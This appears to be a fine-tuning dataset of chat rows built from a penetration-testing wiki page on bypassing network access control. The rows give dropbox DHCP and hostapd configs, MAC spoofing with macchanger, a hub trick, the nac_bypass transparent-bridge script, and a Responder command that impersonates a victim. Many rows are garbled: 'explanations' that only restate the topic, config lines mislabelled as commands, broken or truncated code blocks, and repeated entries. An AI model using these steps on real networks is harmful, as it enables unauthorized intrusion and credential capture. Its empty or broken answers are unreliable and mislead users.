{"role": "assistant", "content": "The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and can be edited to determine how the dropbox will act as a DHCP server.\n\n``\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Network Access Control - DHCP configuration?", "response": "The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and can be edited to determine how the dropbox will act as a DHCP server.\n\n``\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}\n``", "metadata": {"corpus_index": 1608, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the default-lease-time command for network access control - dhcp configuration"}, {"role": "assistant", "content": "default-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the default-lease-time command for network access control - dhcp configuration", "response": "default-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}", "metadata": {"corpus_index": 1609, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "default-lease-time"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Network Access Control - DHCP configuration"}, {"role": "assistant", "content": "default-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Network Access Control - DHCP configuration", "response": "default-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}", "metadata": {"corpus_index": 1609, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `default-lease-time 600;`?"}, {"role": "assistant", "content": "This command is used for network access control - dhcp configuration. DHCP configuration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `default-lease-time 600;`?", "response": "This command is used for network access control - dhcp configuration. DHCP configuration", "metadata": {"corpus_index": 1609, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Network Access Control - Wi-Fi configuration?"}, {"role": "assistant", "content": "The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and can be edited to determine how the dropbox will act as a wireless access point.\n\n``\ninterface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Network Access Control - Wi-Fi configuration?", "response": "The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and can be edited to determine how the dropbox will act as a wireless access point.\n\n``\ninterface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1\n``", "metadata": {"corpus_index": 1610, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Network Access Control - Wi-Fi configuration during a pentest?"}, {"role": "assistant", "content": "The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and can be edited to determine how the dropbox will act as a wireless access point.\n\n``\ninterface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Network Access Control - Wi-Fi configuration during a pentest?", "response": "The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and can be edited to determine how the dropbox will act as a wireless access point.\n\n``\ninterface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1\n``", "metadata": {"corpus_index": 1610, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Network Access Control - Wi-Fi configuration?"}, {"role": "assistant", "content": "interface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Network Access Control - Wi-Fi configuration?", "response": "interface=wlan0\ndriver=nl80211\nssid=kali_hotspot\nhw_mode=g\nchannel=11\nmacaddr_acl=0\nignore_broadcast_ssid=0\nauth_algs=1\nwpa=2\nwpa_passphrase=Sup3rS3cr3tW1F1P@ss!\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=CCMP\nwpa_group_rekey=86400\nieee80211n=1\nwme_enabled=1", "metadata": {"corpus_index": 1611, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `interface=wlan0`?"}, {"role": "assistant", "content": "This command is used for network access control - wi-fi configuration. Wi-Fi configuration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `interface=wlan0`?", "response": "This command is used for network access control - wi-fi configuration. Wi-Fi configuration", "metadata": {"corpus_index": 1611, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Network Access Control - Abuse?"}, {"role": "assistant", "content": "There are several scenarios to take into consideration with specific bypass possibilities.\n\nCompanies usually have devices that don't fully support 802.1x. Among them can be printers, VOIP equipment, cameras, etc. These will usually be granted access to the network only by having their MAC address in a whitelist. This is often dubbed \"MAC-based NAC\".\n\nMAC-based and 802.1x are usually managed one of many ways:\n\n* by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x -> MAC-based bypass\n* by having the authenticator (i.e. port) check if the devices than connect support 802.1x and switch to MAC-based if they don't\n* by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place -> MAC-based + authentication\n\n> [!TIP]\n> Devices like the Basilisk, Basilisk Zero, or Skunk can be helpful in NAC-bypass engagements. _Nota bene: keep in mind ghosted Linux machines will require custom iptable rules to work smoothly._"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Network Access Control - Abuse?", "response": "There are several scenarios to take into consideration with specific bypass possibilities.\n\nCompanies usually have devices that don't fully support 802.1x. Among them can be printers, VOIP equipment, cameras, etc. These will usually be granted access to the network only by having their MAC address in a whitelist. This is often dubbed \"MAC-based NAC\".\n\nMAC-based and 802.1x are usually managed one of many ways:\n\n* by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x -> MAC-based bypass\n* by having the authenticator (i.e. port) check if the devices than connect support 802.1x and switch to MAC-based if they don't\n* by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place -> MAC-based + authentication\n\n> [!TIP]\n> Devices like the Basilisk, Basilisk Zero, or Skunk can be helpful in NAC-bypass engagements. _Nota bene: keep in mind ghosted Linux machines will require custom iptable rules to work smoothly._", "metadata": {"corpus_index": 1612, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Network Access Control - Abuse"}, {"role": "assistant", "content": "There are several scenarios to take into consideration with specific bypass possibilities.\n\nCompanies usually have devices that don't fully support 802.1x. Among them can be printers, VOIP equipment, cameras, etc. These will usually be granted access to the network only by having their MAC address in a whitelist. This is often dubbed \"MAC-based NAC\".\n\nMAC-based and 802.1x are usually managed one of many ways:\n\n* by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x -> MAC-based bypass\n* by having the authenticator (i.e. port) check if the devices than connect support 802.1x and switch to MAC-based if they don't\n* by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place -> MAC-based + authentication\n\n> [!TIP]\n> Devices like the Basilisk, Basilisk Zero, or Skunk can be helpful in NAC-bypass engagements. _Nota bene: keep in mind ghosted Linux machines will require custom iptable rules to work smoothly._"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Network Access Control - Abuse", "response": "There are several scenarios to take into consideration with specific bypass possibilities.\n\nCompanies usually have devices that don't fully support 802.1x. Among them can be printers, VOIP equipment, cameras, etc. These will usually be granted access to the network only by having their MAC address in a whitelist. This is often dubbed \"MAC-based NAC\".\n\nMAC-based and 802.1x are usually managed one of many ways:\n\n* by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x -> MAC-based bypass\n* by having the authenticator (i.e. port) check if the devices than connect support 802.1x and switch to MAC-based if they don't\n* by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place -> MAC-based + authentication\n\n> [!TIP]\n> Devices like the Basilisk, Basilisk Zero, or Skunk can be helpful in NAC-bypass engagements. _Nota bene: keep in mind ghosted Linux machines will require custom iptable rules to work smoothly._", "metadata": {"corpus_index": 1612, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Network Access Control - MAC-based only"}, {"role": "assistant", "content": "MAC Authentication Bypass (MAB) can be done by spoofing an authorized MAC address.\n\nThe first step in spoofing an authorized MAC address is to find one. This can be done by physically searching addresses on printers, labels, IP phones and similar equipment, or by using Wireshark to manually inspect broadcast and multicast packets that travel on the network and obtain some MAC addresses in the traffic.\n\nmacchanger can then be used to spoof a MAC address. Once there, cables can be swapped to access the customer's network.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Network Access Control - MAC-based only", "response": "MAC Authentication Bypass (MAB) can be done by spoofing an authorized MAC address.\n\nThe first step in spoofing an authorized MAC address is to find one. This can be done by physically searching addresses on printers, labels, IP phones and similar equipment, or by using Wireshark to manually inspect broadcast and multicast packets that travel on the network and obtain some MAC addresses in the traffic.\n\nmacchanger can then be used to spoof a MAC address. Once there, cables can be swapped to access the customer's network.\n\n```bash", "metadata": {"corpus_index": 1613, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Network Access Control - MAC-based only"}, {"role": "assistant", "content": "MAC Authentication Bypass (MAB) can be done by spoofing an authorized MAC address.\n\nThe first step in spoofing an authorized MAC address is to find one. This can be done by physically searching addresses on printers, labels, IP phones and similar equipment, or by using Wireshark to manually inspect broadcast and multicast packets that travel on the network and obtain some MAC addresses in the traffic.\n\nmacchanger can then be used to spoof a MAC address. Once there, cables can be swapped to access the customer's network.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Network Access Control - MAC-based only", "response": "MAC Authentication Bypass (MAB) can be done by spoofing an authorized MAC address.\n\nThe first step in spoofing an authorized MAC address is to find one. This can be done by physically searching addresses on printers, labels, IP phones and similar equipment, or by using Wireshark to manually inspect broadcast and multicast packets that travel on the network and obtain some MAC addresses in the traffic.\n\nmacchanger can then be used to spoof a MAC address. Once there, cables can be swapped to access the customer's network.\n\n```bash", "metadata": {"corpus_index": 1613, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about reset the address to the permanent physical MAC?"}, {"role": "assistant", "content": "macchanger -p eth0\n``\n\n> [!TIP]\n> Some errors may be raised when the interface settings cannot be changed. This is usually due to the interface being used.\n> \n> `bash\n> ifdown eth0\n> macchanger -m \"AA:BB:CC:DD:EE:FF\" eth0\n> ifup eth0\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about reset the address to the permanent physical MAC?", "response": "macchanger -p eth0\n``\n\n> [!TIP]\n> Some errors may be raised when the interface settings cannot be changed. This is usually due to the interface being used.\n> \n> `bash\n> ifdown eth0\n> macchanger -m \"AA:BB:CC:DD:EE:FF\" eth0\n> ifup eth0\n> ``", "metadata": {"corpus_index": 1614, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on reset the address to the permanent physical MAC"}, {"role": "assistant", "content": "macchanger -p eth0\n``\n\n> [!TIP]\n> Some errors may be raised when the interface settings cannot be changed. This is usually due to the interface being used.\n> \n> `bash\n> ifdown eth0\n> macchanger -m \"AA:BB:CC:DD:EE:FF\" eth0\n> ifup eth0\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on reset the address to the permanent physical MAC", "response": "macchanger -p eth0\n``\n\n> [!TIP]\n> Some errors may be raised when the interface settings cannot be changed. This is usually due to the interface being used.\n> \n> `bash\n> ifdown eth0\n> macchanger -m \"AA:BB:CC:DD:EE:FF\" eth0\n> ifup eth0\n> ``", "metadata": {"corpus_index": 1614, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Network Access Control - Authentication only work?"}, {"role": "assistant", "content": "Same thing as MAC-based + authentication, without the MAC-based verification bypass.\n\nA regular authentication to 802.1x (and others) systems can be conducted with xsupplicant (C)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Network Access Control - Authentication only work?", "response": "Same thing as MAC-based + authentication, without the MAC-based verification bypass.\n\nA regular authentication to 802.1x (and others) systems can be conducted with xsupplicant (C).", "metadata": {"corpus_index": 1615, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Network Access Control - Authentication only"}, {"role": "assistant", "content": "Same thing as MAC-based + authentication, without the MAC-based verification bypass.\n\nA regular authentication to 802.1x (and others) systems can be conducted with xsupplicant (C)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Network Access Control - Authentication only", "response": "Same thing as MAC-based + authentication, without the MAC-based verification bypass.\n\nA regular authentication to 802.1x (and others) systems can be conducted with xsupplicant (C).", "metadata": {"corpus_index": 1615, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Network Access Control - MAC-based + authentication work?"}, {"role": "assistant", "content": "In this case, access to the network is granted if the supplicant's MAC address is whitelisted and if the authentication then succeeds.\n\nJust like with MAC-based bypass, the first step is to find an authorized MAC address.\n\nThe second step is to access the port without authentication, which leaves at least two possible ways, both relying on the dropbox."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Network Access Control - MAC-based + authentication work?", "response": "In this case, access to the network is granted if the supplicant's MAC address is whitelisted and if the authentication then succeeds.\n\nJust like with MAC-based bypass, the first step is to find an authorized MAC address.\n\nThe second step is to access the port without authentication, which leaves at least two possible ways, both relying on the dropbox.", "metadata": {"corpus_index": 1616, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Network Access Control - MAC-based + authentication?"}, {"role": "assistant", "content": "In this case, access to the network is granted if the supplicant's MAC address is whitelisted and if the authentication then succeeds.\n\nJust like with MAC-based bypass, the first step is to find an authorized MAC address.\n\nThe second step is to access the port without authentication, which leaves at least two possible ways, both relying on the dropbox."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Network Access Control - MAC-based + authentication?", "response": "In this case, access to the network is granted if the supplicant's MAC address is whitelisted and if the authentication then succeeds.\n\nJust like with MAC-based bypass, the first step is to find an authorized MAC address.\n\nThe second step is to access the port without authentication, which leaves at least two possible ways, both relying on the dropbox.", "metadata": {"corpus_index": 1616, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Network Access Control - Using a Hub"}, {"role": "assistant", "content": "Use a Hub, switch the MAC address to the victim's one, connect the drop box and the victim to the same ethernet port. The “real” device will do the auth stuff, putting the port into authorized mode, and allow both devices to connect to the network. As both have the same MAC, the switch will only have one entry in its ARP / SAT table, not raising suspicion.\n\n> [!TIP]\n> But there is a downside to this method. As long as stateless protocols like UDP are used, both devices can communicate just fine. However when it comes to using stateful protocols like TCP, they will for certain run into issues, as one device behind the Hub will be the first to receive and drop or answer a package e.g. in the 3-way-handshake. One could unplug the original device after it opened the port and have a fully capable device inside the network, but this might very quickly raise alarms, when the device is somewhat monitored and will block access to the network when the next authentication needs to be done."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Network Access Control - Using a Hub", "response": "Use a Hub, switch the MAC address to the victim's one, connect the drop box and the victim to the same ethernet port. The “real” device will do the auth stuff, putting the port into authorized mode, and allow both devices to connect to the network. As both have the same MAC, the switch will only have one entry in its ARP / SAT table, not raising suspicion.\n\n> [!TIP]\n> But there is a downside to this method. As long as stateless protocols like UDP are used, both devices can communicate just fine. However when it comes to using stateful protocols like TCP, they will for certain run into issues, as one device behind the Hub will be the first to receive and drop or answer a package e.g. in the 3-way-handshake. One could unplug the original device after it opened the port and have a fully capable device inside the network, but this might very quickly raise alarms, when the device is somewhat monitored and will block access to the network when the next authentication needs to be done.", "metadata": {"corpus_index": 1617, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Network Access Control - Using a Hub"}, {"role": "assistant", "content": "Use a Hub, switch the MAC address to the victim's one, connect the drop box and the victim to the same ethernet port. The “real” device will do the auth stuff, putting the port into authorized mode, and allow both devices to connect to the network. As both have the same MAC, the switch will only have one entry in its ARP / SAT table, not raising suspicion.\n\n> [!TIP]\n> But there is a downside to this method. As long as stateless protocols like UDP are used, both devices can communicate just fine. However when it comes to using stateful protocols like TCP, they will for certain run into issues, as one device behind the Hub will be the first to receive and drop or answer a package e.g. in the 3-way-handshake. One could unplug the original device after it opened the port and have a fully capable device inside the network, but this might very quickly raise alarms, when the device is somewhat monitored and will block access to the network when the next authentication needs to be done."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Network Access Control - Using a Hub", "response": "Use a Hub, switch the MAC address to the victim's one, connect the drop box and the victim to the same ethernet port. The “real” device will do the auth stuff, putting the port into authorized mode, and allow both devices to connect to the network. As both have the same MAC, the switch will only have one entry in its ARP / SAT table, not raising suspicion.\n\n> [!TIP]\n> But there is a downside to this method. As long as stateless protocols like UDP are used, both devices can communicate just fine. However when it comes to using stateful protocols like TCP, they will for certain run into issues, as one device behind the Hub will be the first to receive and drop or answer a package e.g. in the 3-way-handshake. One could unplug the original device after it opened the port and have a fully capable device inside the network, but this might very quickly raise alarms, when the device is somewhat monitored and will block access to the network when the next authentication needs to be done.", "metadata": {"corpus_index": 1617, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Network Access Control - Using a transparent bridge in the context of penetration testing"}, {"role": "assistant", "content": "This idea involves a device that - simply spoken - in a first instance just lets all the traffic traverse it by means of forwarding rules, being totally transparent to the network and all the participants. It then does some tcpdump magic to sniff traffic like ARP, NetBIOS but also Kerberos, Active Directory, web etc., extracting the needed info to spoof the victim and the networks gateway to stay under the radar. With this info the needed rules in ebtables, iptables etc. are automatically created, and will allow an attacker to interact with the network mimicking the victim.\n\nThere is an awesome tool called nac_bypass from Mick Schneider which he walks through in this blog post.\n\nThe steps are as follows:\n\n* find a target device and put the dropbox in between\n* start the nac_bypass_setup.sh script\n\n![](<./assets/nac bypass setup.png>)\n\n> [!TIP]\n> To manually specify the interfaces, one can do so with the -1 and -2 switches. By default it will treat the lower device as switch side facing, and the next one as victim facing interface.\n\n* Wait until the script gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address in order to perform the attack. If all went well the following info will show up and the device should be able to talk to the network:\n\n![](<./assets/nac bypass gathered MAC addresses.png>)\n\n* run other offensive tools for NTLM capture, relay, etc.\n\n> [!TIP]\n> Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim.\n> \n> ``bash\n> responder --interface br0 --externalip $VICTIM\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Network Access Control - Using a transparent bridge in the context of penetration testing", "response": "This idea involves a device that - simply spoken - in a first instance just lets all the traffic traverse it by means of forwarding rules, being totally transparent to the network and all the participants. It then does some tcpdump magic to sniff traffic like ARP, NetBIOS but also Kerberos, Active Directory, web etc., extracting the needed info to spoof the victim and the networks gateway to stay under the radar. With this info the needed rules in ebtables, iptables etc. are automatically created, and will allow an attacker to interact with the network mimicking the victim.\n\nThere is an awesome tool called nac_bypass from Mick Schneider which he walks through in this blog post.\n\nThe steps are as follows:\n\n* find a target device and put the dropbox in between\n* start the nac_bypass_setup.sh script\n\n![](<./assets/nac bypass setup.png>)\n\n> [!TIP]\n> To manually specify the interfaces, one can do so with the -1 and -2 switches. By default it will treat the lower device as switch side facing, and the next one as victim facing interface.\n\n* Wait until the script gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address in order to perform the attack. If all went well the following info will show up and the device should be able to talk to the network:\n\n![](<./assets/nac bypass gathered MAC 